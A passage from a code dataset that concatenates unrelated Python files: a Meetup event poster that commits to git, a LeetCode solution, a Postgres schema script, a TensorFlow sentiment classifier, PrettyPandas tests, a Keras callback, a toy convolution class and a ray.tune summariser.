print(\"Month\", a, \":\\n\\tOne month has passed.. Here is the current flock:\\n\\t\",size)\n    a+=1 \n\nprint(\"--^-- \"*10,\"\\nI'm bored now, let's sell the sheep and go travelling!! Right now I have $ =\",sum(size)*2)\n","sub_path":"Fundamental/session3/homework/sheep.py","file_name":"sheep.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"327976381","text":"\"\"\"\ntheCodePutter\n\nPuts the code he finds on meetup.\n\"\"\"\n\nimport os\nimport json\nfrom datetime import datetime, timedelta\nfrom shutil import copyfile\nfrom subprocess import run\nfrom subprocess import PIPE\nfrom functools import reduce\nfrom pytz import timezone\nimport pytz\nimport reyaml\nimport requests\n\nclass Event(object):\n    \"\"\"Represents the MeetUp event\"\"\"\n    def __init__(self, id, name, time, duration, description, updated, venue_name, **kwargs):\n        self.id = id  # Using id from the meetup api, thus the name override.\n        self.name = name\n        self.time = time\n        self.duration = duration\n        self.description = description\n        self.updated = updated\n        self.venue_name = venue_name\n        self.length = timedelta(milliseconds=self.duration)\n        self.set_timezone()\n\n    def __repr__(self):\n        return json.dumps(self.__dict__)\n\n    def _localize(self, the_time, zone=None):\n        if zone is None:\n            zone = pytz.utc\n        utc = datetime.fromtimestamp(the_time)\n        return utc.astimezone(zone)\n\n    def set_timezone(self, time_zone=None):\n        \"\"\"Applies the given timezone to the datetime values of the event\"\"\"\n        self.when = self._localize(self.time, time_zone)\n        self.modified = self._localize(self.updated, time_zone)\n\ndef get_next_event(api_key, api_root, group_name):\n    \"\"\"Returns the next meetup event.\"\"\"\n    url = \"{0}/{1}/events\".format(api_root, group_name)\n    params = {\n        \"scroll\": \"next_upcoming\",\n        \"page\": \"1\",\n        \"key\": api_key\n    }\n    response = requests.get(url, params=params)\n    data = response.json()[0]\n\n
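    # The events endpoint returns a list even with page=1; element 0 is the next\n    # upcoming event. 'time' and 'updated' arrive as epoch milliseconds, so they are\n    # divided by 1000 below to get the seconds that datetime.fromtimestamp expects\n    # (e.g. 1500000000000 ms -> 1500000000 s).\n    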
data[\"time\"] = data[\"time\"] / 1000 # MeetUp gives timestamp in milliseconds\n data[\"updated\"] = data[\"updated\"] / 1000 # MeetUp gives timestamp in milliseconds\n\n event = Event(venue_name=data[\"venue\"][\"name\"], **data)\n return event\n\ndef generate_post_filename(event):\n \"\"\"Generates the filename for the event's post\"\"\"\n return event.when.strftime(\"%B-%Y-meetup.md\").lower()\n\ndef get_template_path(template_name):\n \"\"\"Get the path to the template file that will be copied\"\"\"\n return os.path.join(\"./scaffolds\", template_name + \".md\")\n\ndef process_placeholders(filename, event):\n \"\"\"Returns processing the placeholders in the filename with values from the event\"\"\"\n content = \"\"\n values = event.__dict__\n with open(filename, mode=\"r\") as post_file:\n for line in post_file:\n content += line.format(**values)\n return content\n\ndef get_git_url(config_filename, path_to_git_setting):\n \"\"\"Reads the git url from the given yaml config file\"\"\"\n config = reyaml.load_from_file(config_filename)\n return reduce((lambda cur, item: cur[item]), path_to_git_setting.split(\"/\"), config)\n\ndef commit_post(filename, git_url, message=\"Auto commit by thePutter\", branch_name=\"master\"):\n \"\"\"Stages, commits, and pushes the created post\"\"\"\n if did_post_change(filename):\n print(\"Post changed: %s, pushing it.\" % filename)\n run([\"git\", \"remote\", \"rm\", \"putter\"])\n run([\"git\", \"remote\", \"add\", \"putter\", git_url])\n run([\"git\", \"add\", filename])\n run([\"git\", \"commit\", \"-m\", message])\n\n # The build runs in detached head state. This works, but, I'm not sure\n # what sideeffects this may have. Something I'll look into.\n run([\"git\", \"push\", \"putter\", \"HEAD:\" + branch_name])\n else:\n print(\"Post did NOT change: %s\" % filename)\n\ndef did_post_change(filename):\n \"\"\"Checks if the post filename changed or was created due to the generation process\"\"\"\n status = run([\"git\", \"status\", \"-s\"], stdout=PIPE, universal_newlines=True).stdout\n lines = status.split(\"\\n\")\n if \" M %s\" % filename in lines or \"?? 
%s\" % filename in lines:\n return True\n else:\n return False\n\ndef generate_post(template, destination_folder, event):\n \"\"\"Generates event post file\"\"\"\n\n # Create initial post from template\n file_name = generate_post_filename(event)\n full_filename = destination_folder + \"/\" + file_name\n copyfile(template, full_filename)\n\n content = process_placeholders(full_filename, event)\n\n # Saving processed content\n with open(full_filename, mode=\"w\") as post_file:\n for line in content:\n post_file.write(line)\n\n return full_filename\n\ndef get_putter_config(filename=\"thecodeputter.yml\"):\n \"\"\"Gets the config to use for processing\"\"\"\n return reyaml.load_from_file(filename)\n\ndef putt():\n \"\"\"Runs the processing\"\"\"\n config = get_putter_config()\n event = get_next_event(config[\"meetup_apikey\"], config[\"meetup_root\"], config[\"group_name\"])\n event.set_timezone(timezone(config[\"group_timezone\"]))\n template_path = get_template_path(config[\"template_name\"])\n post_filename = generate_post(template_path, config[\"posts_path\"], event)\n\n git_url = get_git_url(config[\"yaml_filename\"], config[\"yaml_query\"])\n commit_post(post_filename, git_url, branch_name=config[\"posts_branch\"])\n\nif __name__ == \"__main__\":\n putt() # FORE!\n","sub_path":"put-meetup-event.py","file_name":"put-meetup-event.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"168170520","text":"'''\n// Source : https://oj.leetcode.com/problems/single-number/\n// Author : Hal\n// Date : 2019-12-07\n\n/**********************************************************************************\n*\n* Given an array of integers, every element appears twice except for one. Find that single one.\n*\n* Note:\n* Your algorithm should have a linear runtime complexity. 
Could you implement it without using extra memory?\n*\n*\n**********************************************************************************/\n'''\n\nclass Solution:\n \n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n hash = {}\n for num in nums:\n try:\n hash.pop(num)\n except:\n hash[num] = 1\n\n for key in hash.keys():\n return(key)\n","sub_path":"algorithms/python/SingleNumber/singleNumber.py","file_name":"singleNumber.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"28396641","text":"from os import strerror as strerr\nimport sys\n\nbfr = open(sys.argv[1], 'r')\nctn: list = [i for i in bfr.read()]\ncontents: list = []\nfor i in ctn:\n contents.append(int(i, 16))\n\ndata = bytearray(len(contents))\n\nfor i in range(len(data)):\n data[i] = contents[i]\ntry:\n bfw = open(sys.argv[1], 'wb')\n bfw.write(data)\n bfw.close()\n bfr.close()\nexcept IOError as e:\n print(\"I/O error occurred:\", strerr(e.errno))","sub_path":"src/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625128588","text":"#!/usr/bin/python3\nimport psycopg2\nimport sys\n\nretry=5\nwhile retry:\n try:\n database='ups'\n conn = psycopg2.connect(database='postgres',\\\n user='postgres', \n host='db', port='5432')\n\n print(\"Opened database %s successfully.\" % database)\n break\n except:\n print(\"Failed to connect to database %s.\", database)\n time.sleep(3)\n retry-=1\n\n\ntry: \n cur = conn.cursor()\n cur.execute('''DROP TABLE IF EXISTS service_package CASCADE;''')\n cur.execute('''DROP TABLE IF EXISTS service_truck CASCADE;''')\n # cur.execute('''DROP TABLE IF EXISTS service_account CASCADE;''')\n\n conn.commit()\nexcept:\n print (sys.exc_info())\n print ('Error: Drop tables')\n pass\n\n\n\"\"\"\ntry:\n cur = conn.cursor()\n cur.execute('''CREATE TABLE service_account(\n user_id int,\n username TEXT PRIMARY KEY\n );''')\n\n # cur.execute('''INSERT INTO service_account VALUES ('Jiaran');''')\n # cur.execute('''INSERT INTO service_account VALUES ('Yanjia');''')\n \n conn.commit()\n\nexcept:\n print (sys.exc_info())\n print ('Table may already exist.')\n pass\n\"\"\"\n\ntry:\n cur.execute('''CREATE TABLE service_truck(\n truck_id int PRIMARY KEY,\n x int,\n y int,\n status TEXT\n );''')\n \n conn.commit()\n\nexcept:\n print (sys.exc_info())\n print ('Table may already exist.')\n pass\n\ntry:\n cur.execute('''CREATE TABLE service_package(\n package_id int PRIMARY KEY,\n wh_id int,\n w_x int,\n w_y int,\n d_x int,\n d_y int,\n truck_id int,\n loaded boolean,\n acc_id TEXT,\n status TEXT,\n waiting boolean,\n loading boolean,\n delivering boolean,\n delivered boolean,\n waiting_t TEXT,\n loading_t TEXT,\n delivering_t TEXT,\n delivered_t TEXT,\n FOREIGN KEY(acc_id) REFERENCES service_account(username),\n FOREIGN KEY(truck_id) REFERENCES service_truck(truck_id)\n );''')\n \n conn.commit()\n\nexcept:\n print (sys.exc_info())\n print ('Table may already exist.')\n pass\n\nconn.close()\n","sub_path":"UPS-docker/web-app/src/database_setup.py","file_name":"database_setup.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548349057","text":"# LSTM neural network\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport re\n\n\n# Importing RNN word to int 
mapping\nimport pickle\n\nword_to_int = pickle.load(open(os.path.join(os.getcwd(), 'models', 'RNN_word_to_int.pkl'), 'rb'))\n\nseq_len = 200 # as used in training\nbatch_size = 64\nn_words = len(word_to_int)+1\nembed_size = 256\nlstm_layers = 1\nlstm_size = 128\n\ndef preprocessing(text):\n # Removing the tags\n text = re.sub('<[^>]*>', '', text)\n # Extracting the emoticons\n emoticons = re.findall('(?::|;|=)(?:-)?(?:\\)|\\(|D|P)', text)\n text = re.sub('[\\W]+', ' ', text.lower()) + ' '.join(emoticons).replace('-','')\n return text\n\n\ndef classify(review):\n review = preprocessing(review)\n mapped_review = []\n for word in review.split():\n if word in word_to_int.keys():\n mapped_review.append(word_to_int[word])\n else:\n mapped_review.append(0)\n seq = np.zeros((1,seq_len),dtype = int)\n review_arr = np.array(mapped_review)\n seq[0,-len(mapped_review):] = review_arr[-seq_len:]\n with tf.Session() as sess:\n # Change to that directory where your saved model is\n\n saver = tf.train.import_meta_graph(os.path.join(os.getcwd(), \"models\", \"CNN\",\"senti-59.ckpt.meta\"))\n saver.restore(sess, tf.train.latest_checkpoint(os.path.join(os.getcwd(), \"models\", \"CNN\")))\n # not using dropout in testing\n graph = tf.get_default_graph()\n tf_x = graph.get_tensor_by_name(\"inputs/tf_x:0\")\n tf_keepprob = graph.get_tensor_by_name(\"inputs/tf_keepprob:0\")\n y_prob = graph.get_tensor_by_name(\"output/predict:0\")\n feed = {tf_x: seq, tf_keepprob: 1.0}\n pred = sess.run([y_prob],feed_dict=feed)\n pred = pred[0][0]\n if round(pred) == 0:\n res = \"Negative\"\n else:\n res = \"Positive\"\n # low probability means it is a mixed review\n return res, pred\n\n","sub_path":"classifier_deployments/CNN_testing.py","file_name":"CNN_testing.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"10526463","text":"# -*-coding:utf-8-*-\nimport sys\nimport random\n\nsys.path.insert(0, \"/opt/densenet.mxnet\")\n\nimport os\nimport time\nimport argparse\nimport shutil\n\nfrom sign_labels import sign_total_labels\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--label_dir', type=str, required=True)\n parser.add_argument('--dataset_dir', type=str, required=True)\n args = parser.parse_args()\n\n label_map = {}\n label_name = {}\n for label in sign_total_labels:\n label_map[label.label] = label.categoryId\n label_name[label.label] = label.name\n\n label_dir = args.label_dir\n dataset_dir = args.dataset_dir\n\n if not os.path.exists(label_dir):\n print(\"dir[{}] is not exist\".format(label_dir))\n exit(0)\n if not os.path.exists(dataset_dir):\n os.makedirs(dataset_dir)\n\n time_start = time.time()\n\n class_file = {}\n dir_list = os.listdir(label_dir)\n for dir_name in dir_list:\n dir_path = os.path.join(label_dir, dir_name)\n if os.path.isdir(dir_path):\n label_file = os.path.join(dir_path, \"ImageType.csv\")\n if not os.path.exists(label_file):\n continue\n else:\n continue\n\n with open(label_file, \"r\") as f:\n line_str = f.readline()\n # skip first line\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n image_name, class_id = line_str.split(\",\")\n\n train_id = label_map[class_id]\n class_name = label_name[class_id]\n\n # path = os.path.join(dataset_dir, \"origin\", class_name.encode(\"UTF-8\"))\n # if not os.path.exists(path):\n # os.makedirs(path)\n # shutil.copy(os.path.join(label_dir, dir_name, image_name),\n # os.path.join(path, 
os.path.basename(image_name)))\n path = os.path.join(dataset_dir, \"origin_1\", class_id)\n if not os.path.exists(path):\n os.makedirs(path)\n shutil.copy(os.path.join(label_dir, dir_name, image_name),\n os.path.join(path, os.path.basename(image_name)))\n\n if train_id not in class_file:\n class_file[train_id] = []\n class_file[train_id].append(os.path.join(dir_name, image_name))\n line_str = f.readline()\n\n chose_count = 1000\n for train_id, file_list in class_file.items():\n if len(file_list) > chose_count:\n random.seed(random.randint(10, 100))\n random.shuffle(file_list)\n chose_list = file_list[:chose_count]\n else:\n chose_list = file_list\n\n id_dir = os.path.join(dataset_dir, str(train_id))\n if not os.path.exists(id_dir):\n os.makedirs(id_dir)\n\n for file_id in chose_list:\n shutil.copy(src=os.path.join(label_dir, file_id),\n dst=os.path.join(id_dir, os.path.basename(file_id)))\n\n time_end = time.time()\n print(\"finish in {} s\".format(time_end - time_start))","sub_path":"sign_classfication/make_train_3.py","file_name":"make_train_3.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"276422318","text":"import copy\nfrom operator import itemgetter\n\nimport pytest\nimport numpy\nimport pandas\n\nfrom prettypandas import PrettyPandas\n\n\n@pytest.fixture()\ndef dataframe():\n numpy.random.seed(24)\n df = pandas.DataFrame({'A': numpy.linspace(1, 10, 10)})\n df = pandas.concat([df, pandas.DataFrame(numpy.random.randn(10, 4),\n columns=list('BCDE'))],\n axis=1)\n return df\n\n\n@pytest.fixture()\ndef prettyframe(dataframe):\n return PrettyPandas(dataframe, precision=1)\n\n@pytest.fixture()\ndef nan_dataframe():\n return pandas.DataFrame({\n 'vals-a': [1, 2, 3, 10, 7, 6],\n 'vals-b': [3, 4, 3, 6, 5, 5],\n 'vals-a-nan': [1, 2, numpy.nan, 10, 7, 6],\n 'vals-b-nan': [3, numpy.nan, 3, 6, 5, numpy.nan],\n 'weights': [1, 2, 1, 1, 3, 2],\n 'weights-nan': [1, 2, 1, 1, numpy.nan, 2],\n 'percent col': [0.1, 0.2, numpy.nan, 0.3, 0.4, 0.5],\n 'big-vals': [1e3, 10e3, 1e6, 10e6, numpy.nan, numpy.nan],\n 'groups': ['a', 'b', 'a', 'b', 'c', 'c'],\n 'groups-nan': [numpy.nan, 'b', 'a', numpy.nan, 'c', 'c'],\n 'groups2': ['x', 'x', 'x', 'y', 'y', 'y'],\n 'date': pandas.date_range(start = pandas.Timestamp(2020, 1, 1),\n periods = 6).values\n })\n\ndef test_creation(dataframe):\n PrettyPandas(dataframe)\n\n try:\n PrettyPandas(None)\n except TypeError:\n assert True\n\n p1 = PrettyPandas(dataframe, precision=2)\n assert p1.precision == 2\n assert p1.summary_rows == {}\n assert p1.summary_cols == {}\n assert p1.formatters == []\n\n p2 = PrettyPandas(dataframe).total(title = 'test')\n assert 'test' in p2.summary_rows\n assert p1.summary_cols == {}\n assert p1.formatters == []\n\n\ndef test_data_safety(dataframe):\n df1 = copy.deepcopy(dataframe)\n\n df = PrettyPandas(dataframe, precision=1)\n df.total()._translate()\n\n assert all(dataframe == df1)\n assert all(df.data == df1)\n\n\ndef test_summary(dataframe):\n p1 = PrettyPandas(dataframe, precision=1).total()\n actual = list(p1.data.sum())\n\n r = p1._translate()\n row = [cell for cell in r['body'][10] if cell['type'] == 'td']\n values = [cell['value'] for cell in sorted(row, key=itemgetter('id'))]\n\n assert values == actual\n\n\ndef test_summary_fns(dataframe):\n PrettyPandas(dataframe).total()\n PrettyPandas(dataframe).average()\n PrettyPandas(dataframe).median()\n PrettyPandas(dataframe).max()\n PrettyPandas(dataframe).min()\n\n out = 
PrettyPandas(dataframe).total()\n assert len(out.summary_rows) == 1\n assert len(out.summary_cols) == 0\n\n out = PrettyPandas(dataframe).total(axis='columns')\n assert len(out.summary_rows) == 0\n assert len(out.summary_cols) == 1\n\n out = PrettyPandas(dataframe).total(axis=None)\n assert len(out.summary_rows) == 1\n assert len(out.summary_cols) == 1\n\n out = PrettyPandas(dataframe).min().max()\n assert len(out.summary_rows) == 2\n assert len(out.summary_cols) == 0\n\n out = PrettyPandas(dataframe).min().max(axis='cols')\n assert len(out.summary_rows) == 1\n assert len(out.summary_cols) == 1\n\n\ndef test_mulitindex():\n df = pandas.DataFrame({'A': [1, 2],\n 'B': [3, 4],\n 'D': [4, 3],\n 'C': [6, 7]})\n\n output = PrettyPandas(df.set_index(['A', 'B'])).total(axis='cols')._translate()\n\n for row in output['body']:\n assert row[-1]['value'] == 10\n\n headings = {style['value']: style['class']\n for style in output['head'][0]}\n assert headings == {'A': 'index_name level0',\n 'B': 'index_name level1',\n 'C': 'col_heading level0 col1',\n 'D': 'col_heading level0 col0',\n 'Total': 'col_heading level0 col2',}\n\n\ndef test_as_percent(prettyframe):\n p = prettyframe.as_percent()._translate()\n\n cells = []\n for row in p['body']:\n values = [cell['value'] for cell in row if cell['type'] == 'td']\n cells.extend(values)\n\n assert all(c.endswith('%') for c in cells)\n\n\ndef test_as_currency(prettyframe):\n p = prettyframe.as_currency(locale='en_US', currency='USD')._translate()\n\n cells = []\n for row in p['body']:\n values = [cell['value'] for cell in row if cell['type'] == 'td']\n cells.extend(values)\n\n assert all(c.startswith('US$') or c.startswith('-US$') for c in cells)\n\n\ndef test_as_unit(prettyframe):\n p = prettyframe.as_unit('cm', location='suffix')._translate()\n\n cells = []\n for row in p['body']:\n values = [cell['value'] for cell in row if cell['type'] == 'td']\n cells.extend(values)\n\n assert all(c.endswith('cm') for c in cells)\n\n\ndef test_fillna(nan_dataframe):\n pp = PrettyPandas(nan_dataframe, fillna='#NA').as_number(exclude = ['groups', 'groups-nan', 'groups2', 'date'])\n formatted_df = pp.get_formatted_df()\n\n pandas.testing.assert_frame_equal(formatted_df == '#NA',\n nan_dataframe.isnull())\n\ndef test_as_date(nan_dataframe):\n pp = PrettyPandas(nan_dataframe, fillna='#NA').as_date(subset = ['date'])\n formatted_df = pp.get_formatted_df()\n\n pandas.testing.assert_series_equal(formatted_df['date'],\n (nan_dataframe['date'].apply(lambda d: str(d.date()) if pandas.notnull(d) else '#NA')))\n\ndef test_auto_format(nan_dataframe):\n pp = (\n PrettyPandas(nan_dataframe, fillna='#NA')\n .as_unit('£', precision=2, subset = ['vals-b'])\n .auto_format(float_precision=0, percent_precision=1)\n )\n formatted_df = pp.get_formatted_df()\n\n pandas.testing.assert_series_equal(formatted_df['date'],\n (nan_dataframe['date'].apply(lambda d: str(d.date()) if pandas.notnull(d) else '#NA')))\n pandas.testing.assert_series_equal(formatted_df['percent col'],\n (nan_dataframe['percent col'].apply(lambda v: f'{v:.1%}' if pandas.notnull(v) else '#NA')))\n pandas.testing.assert_series_equal(formatted_df['big-vals'],\n (nan_dataframe['big-vals'].apply(lambda v: f'{v:,.0f}' if pandas.notnull(v) else '#NA')))\n pandas.testing.assert_series_equal(formatted_df['vals-b'],\n (nan_dataframe['vals-b'].apply(lambda v: f'£{v:,.2f}' if pandas.notnull(v) else '#NA')))\n\ndef test_multi_index_summary_row(nan_dataframe):\n nan_dataframe.index = pandas.MultiIndex.from_product([[0], nan_dataframe.index])\n 
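# Wrapping both axes in a one-level MultiIndex exercises the tuple-key exclude path\n    # (e.g. (0, 'groups')) used in the call below.\n    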
nan_dataframe.columns = pandas.MultiIndex.from_product([[0], nan_dataframe.columns])\n\n PrettyPandas(nan_dataframe).total(exclude=[(0,'groups'), (0,'groups-nan'), (0,'groups2'), (0, 'date')])\n\n\ndef test_multi_index_summary_rcol(nan_dataframe):\n nan_dataframe.index = pandas.MultiIndex.from_product([[0], nan_dataframe.index])\n nan_dataframe.columns = pandas.MultiIndex.from_product([[0], nan_dataframe.columns])\n\n PrettyPandas(nan_dataframe.T).total(exclude=[(0, 'groups'), (0, 'groups-nan'), (0, 'groups2'), (0, 'date')], axis='cols')\n\ndef test_total_or_wavg(dataframe):\n\n lhs_array = dataframe.sum()\n wavg_b = numpy.average(dataframe.B, weights=dataframe.A)\n wavg_c = numpy.average(dataframe.C, weights=dataframe.A)\n\n #case 1: no wavg_subset -> all sums\n df_pp = PrettyPandas(dataframe).total_or_wavg()\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n assert numpy.array_equiv(lhs_array, total_or_wa_row)\n\n #case 2: some wavg (default sums)\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A')\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n lhs_array['B':'C'] = [wavg_b, wavg_c]\n assert numpy.array_equiv(lhs_array, total_or_wa_row)\n\n #case 3: spcify sum_subset / exclude\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A', \n sum_subset=['A', 'D'])\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n\n lhs_array['E'] = None\n assert numpy.allclose(lhs_array, total_or_wa_row, equal_nan=True)\n\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A', \n exclude=['E'])\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n assert numpy.allclose(lhs_array, total_or_wa_row, equal_nan=True)\n \n #case 4: wavgs only\n df_pp = PrettyPandas(dataframe).total_or_wavg(wavg_subset=['B', 'C'],\n w_field='A', \n default_sum=False)\n total_or_wa_row = df_pp.summary_rows['Total / WA'].values\n\n lhs_array['A'] = None\n lhs_array['D'] = None\n assert numpy.allclose(lhs_array, total_or_wa_row, equal_nan=True)\n \n","sub_path":"test/test_pretty_pandas.py","file_name":"test_pretty_pandas.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297126629","text":"from hostlist import expand_hostlist\nfrom cloudmesh.common.dotdict import dotdict\n\nclass Parameter(object):\n @classmethod\n def expand(cls, parameter, allow_duplicates=False, sort=False):\n \"\"\"\n Parameter.expand(\"a[0-1]\") -> [\"a0\", \"a1\"]\n :param parameter:\n :param allow_duplicates:\n :param sort:\n :return:\n \"\"\"\n if parameter is None:\n return parameter\n else:\n return expand_hostlist(parameter, allow_duplicates=False, sort=False)\n\n @staticmethod\n def find(name, *dicts):\n \"\"\"\n Finds the value for the key name in multiple dicts\n\n :param name: the key to find\n :param dicts: the list of dicts\n :return:\n \"\"\"\n for d in dicts:\n if type(d) == str:\n return d\n elif name in d and d[name] is not None:\n return d[name]\n\n return None\n\n @staticmethod\n def find_bool(name, *dicts):\n \"\"\"\n Finds the value for the key name in multiple dicts\n\n :param name: the key to find\n :param dicts: the list of dicts\n :return:\n \"\"\"\n value = False\n\n for d in dicts:\n if type(d) == str:\n value = d == 'True'\n elif name in d:\n value = d[name]\n if type(value) == str:\n value = value == 'True'\n\n if value:\n return True\n\n return False\n\n @staticmethod\n def 
arguments_to_dict(arguments):\n        \"\"\"\n        converts a string of the form \"a=1,b=2\" to a dict\n        {\"a\":\"1\", \"b\":\"2\"}\n        all values are strings\n\n        :param arguments: the argument string\n        :return: a dict of arguments and values\n        \"\"\"\n        if arguments is None or len(arguments) == 0:\n            return None\n        parameters = {}\n        # Split the comma-separated pairs first, then each pair on its first '='.\n        for argument in arguments.split(\",\"):\n            key, value = argument.split(\"=\", 1)\n            parameters[key] = value\n        return parameters\n\n","sub_path":"cloudmesh/common/parameter.py","file_name":"parameter.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518083565","text":"'''\n    The Hera Callback\n'''\n\nfrom __future__ import absolute_import\nimport json\n\nfrom keras.callbacks import Callback\nfrom heraspy.util import to_jsonable_dict\n\nfrom heraspy.events import (\n    TRAIN_BEGIN, TRAIN_END,\n    EPOCH_BEGIN, EPOCH_END,\n    BATCH_END\n)\n\nclass HeraCallback(Callback):\n\n    '''\n    A Keras callback streaming data to a hera socket server\n    '''\n\n    def __init__(self, namespace, dispatcher, hera_config=None):\n\n        self.dispatcher = dispatcher\n        self.namespace = namespace\n        self.hera_config = hera_config\n        self.current_epoch = 0\n        self.batch_idx = 0\n\n        super(HeraCallback, self).__init__()\n\n    def on_train_begin(self, *args):\n        self.dispatcher(\n            self.namespace,\n            TRAIN_BEGIN,\n            {\n                'params': self.params,\n                'modelJson': json.loads(self.model.to_json()),\n            }\n        )\n\n\n    def on_train_end(self, *args):\n\n        self.dispatcher(\n            self.namespace,\n            TRAIN_END,\n            None\n        )\n\n\n    def on_epoch_begin(self, epoch, *args):\n        self.current_epoch = epoch\n        self.dispatcher(\n            self.namespace,\n            EPOCH_BEGIN,\n            {\n                'epoch': epoch,\n                'batchIdx': self.batch_idx,\n                'params': self.params\n            }\n        )\n\n    def on_epoch_end(self, epoch, *args):\n        self.dispatcher(\n            self.namespace,\n            EPOCH_END,\n            {\n                'epoch': epoch,\n                'params': self.params\n            }\n        )\n\n    def on_batch_end(self, batch, logs):\n        self.dispatcher(\n            self.namespace,\n            BATCH_END,\n            {\n                'batch': batch,\n                'epoch': self.current_epoch,\n                'idx': self.batch_idx,\n                'metricData': to_jsonable_dict(\n                    dict([\n                        (metric, logs[metric])\n                        for metric in self.params['metrics']\n                        if metric in logs\n                    ])\n                ),\n            }\n        )\n        self.batch_idx += 1\n\n","sub_path":"heraspy/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154388484","text":"import tensorflow as tf\nimport numpy as np\nclass Convolution():\n    \n    def __init__(self,filters,kernels,padding,stride,activation) :\n        self.filters = filters\n        self.kernels = kernels\n        self.padding = padding\n        self.stride = stride\n        self.bias = np.random.normal(size=(3,3))\n        self.activation = activation\n\n    def doConvolution(self,inputs,kernels, bias):\n        \n        # 2-D input: (height, width)\n        (inputs_prev_height, inputs_prev_width) = inputs.shape\n        (curr_height, curr_width) = kernels.shape\n\n        output_height = int(int(inputs_prev_height + 2 * self.padding - curr_height) / self.stride + 1)\n        output_width = int(int(inputs_prev_width + 2 * self.padding - curr_width) / self.stride + 1)\n        \n        output = tf.zeros(shape=(output_height,output_width)).numpy()\n        padded_inputs = self.zeroPadding(inputs)\n        slice_padded_inputs = tf.zeros(shape=(padded_inputs.shape))\n        for height in range(output_height):\n            vertical_start = self.stride * height\n            vertical_end = vertical_start + curr_height\n            for width in range(output_width):\n                horiz_start = self.stride*width\n                horiz_end = horiz_start + curr_width\n\n
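                # Slice out the current receptive field from the padded input; e.g. a 5x5\n                # input with a 3x3 kernel, stride 1 and padding 1 gives a 5x5 output,\n                # matching the size formula above.\n                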
slice_padded_inputs = padded_inputs[vertical_start:vertical_end,horiz_start:horiz_end]\n output[height,width] = self.convComputation(slice_padded_inputs,self.kernels,self.bias)\n\n return output\n\n def convComputation(self,inputs,Weights, Bias):\n i_w = tf.multiply(inputs, Weights)\n i_w = tf.reduce_sum(i_w, axis= None)\n i_w = i_w + Bias\n return i_w\n\n\n def zeroPadding(self,image):\n \"Only Works With 2D Image\"\n \"Padd the whole image \"\n\n return tf.pad(image,( (self.padding, self.padding), (self.padding,self.padding) ))\n\nif __name__ == \"__main__\":\n tf.random.set_seed(5)\n inputs = tf.random.normal(shape=(5,5))\n\n weights = tf.random.normal(shape=(3,3))\n bias = tf.random.normal(shape=(1,1))\n\n ","sub_path":"convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"196782635","text":"\"\"\"\nAnalyze a ray.tune run; plot training curves, show best run etc.\n\"\"\"\n\nimport argparse\nfrom typing import Dict, Any\nfrom ray.tune.analysis import Analysis\nimport os\nimport shutil\nimport glob2\nfrom shutil import copyfile\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nDEFAULT_TRAIN_METRIC = 'loss_train'\nDEFAULT_VALID_METRIC = 'loss_eval'\n#BASE_PATH = '/Net/Groups/BGI/work_3/LSTM_CO2flux_upscaling/lstm_fluxnet/experiments/'\n#DEFAULT_TARGET_BASE_DIR = '/Net/Groups/BGI/work_3/LSTM_CO2flux_upscaling/lstm_fluxnet/experiments/'\n\ndef summarize_run(store):\n summarize(\n path=store,\n overwrite=True)\n\ndef summarize(\n path: str,\n train_metric: str = DEFAULT_TRAIN_METRIC,\n eval_metric: str = DEFAULT_VALID_METRIC,\n overwrite: bool = False) -> None:\n\n print(f'\\nLoading experiment from: \\n{path}\\n')\n\n #if not os.path.isfile(path):\n # raise ValueError(f'Path does not exist or is directory:\\n{path}')\n #if path[-5:] != '.json':\n # raise ValueError(f'Not a .json file:\\n{path}')\n\n #path_split = path.split(BASE_PATH)[1].split('/')\n #var = path_split[0]\n #name = path_split[1]\n #mode = path_split[2]\n summary_dir = os.path.join(path, 'summary')\n\n if os.path.isdir(summary_dir):\n if not overwrite:\n raise ValueError(\n f'Target directory `{summary_dir}` exists, use `--overwrite` to replace.')\n shutil.rmtree(summary_dir)\n os.makedirs(summary_dir)\n \n exp = Analysis(path)\n\n configs = exp.dataframe()\n configs['rundir'] = [os.path.join(l, 'progress.csv')\n for l in configs['logdir']]\n runs = []\n for i, f in enumerate(configs['rundir']):\n df = pd.read_csv(f)\n df['uid'] = i\n runs.append(df)\n runs = pd.concat(runs)\n\n 